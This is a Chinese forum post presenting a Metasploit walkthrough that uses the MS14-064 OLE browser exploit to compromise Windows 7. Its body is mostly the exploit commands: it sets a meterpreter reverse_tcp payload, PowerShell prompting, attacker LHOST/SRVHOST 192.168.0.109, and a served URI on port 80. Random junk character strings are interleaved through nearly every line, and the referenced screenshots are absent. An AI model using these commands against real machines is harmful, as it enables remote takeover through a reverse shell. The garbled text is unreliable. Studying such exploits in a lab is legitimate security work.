找回密码
 立即注册
查看: 2626|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; ]3 D2 @# J! O 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 M9 h# y% A/ y) D

8 p4 M0 s% Y D: t

$ \* k: b& f. s$ Y+ ~0 N4 X 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 6 C- N0 l6 {8 l% G7 Y

% B4 l, b( d8 j

( @3 e0 l$ b" J+ s% g5 [ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp - x$ T' @+ T# }: ]; D

3 y3 W2 `3 g2 O# Q# @. f, {

7 P, H# B8 f9 l' U8 j5 \/ `             set AllowPowershellPrompt true% ^" ?5 f. D* z \5 p+ C$ ?

; @) q7 f4 b+ R& _5 A8 r

; Y$ H: }8 ^2 U( H             Set LHOST 192.168.0.109 * X, A: A7 N* ]0 l+ X

7 {+ n; x8 M& G8 C+ s& p- T% N

. o- N8 k: t3 ^# H             set SRVHOST 192.168.0.109 $ q3 i) D5 ?" W$ j; d9 U4 I

4 _0 m2 E+ } s4 R0 _8 {1 F$ G

9 Y5 O& @9 o; ^ ~2 b2 a3 q7 Q2 ~             Set uripath share7 @! {2 y" `. j1 O* ^- n& ~0 ]- }, A

( Z( N) }4 u; D2 g0 Q

* u% r9 ]9 R- A6 X ^& D. M             Set srvport 80 + g6 Z# A) k9 w% a0 {

) o, i) |* M4 F3 Q. O

: j, p, o1 E$ B8 [* I) A, w  % L- W x' M6 {$ V+ N

$ M0 V0 t* a3 V

* S- [) c: b2 o: g# [/ M; p  # }) V u0 s2 |% Q$ N, S

3 F9 B# U2 J& W0 e& J1 x

n$ L. w' Z; w& n5 o$ H2 @# ]  3 b$ B* }2 B) ^4 G/ j/ V

2 ]3 i$ V( Y0 ?- h8 _8 F

- h9 P% q. E2 m! x1 Z& X( g   ' M+ U+ r9 X% ~% H

' H. J5 \, l5 R! K( C

( t: ?4 f4 ?3 N( l \   # F* J4 b" [) W5 I

* b+ @8 A6 ^0 e! U d6 b

5 D# e& C/ y4 h- h% q9 @; _ 下面我们来访问本地地址如图:2 U7 c- z5 Z3 U7 ~, A* N

7 e+ G q# k9 O; [

2 l, o" A/ J6 t F3 y  2 u0 a; I/ _# p7 N* d2 V& h

: P4 @4 A3 b" h$ r4 S; U

+ C+ G: V2 m) Z6 s( P0 W5 U   1 y3 F! P, a0 I1 l/ Q

3 B" A* m# x6 ~% u, n3 m, l& _ C4 k

v- F% {0 `# a1 e7 T4 {$ H% C + k" V1 Y, M0 G3 Q L9 T0 Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表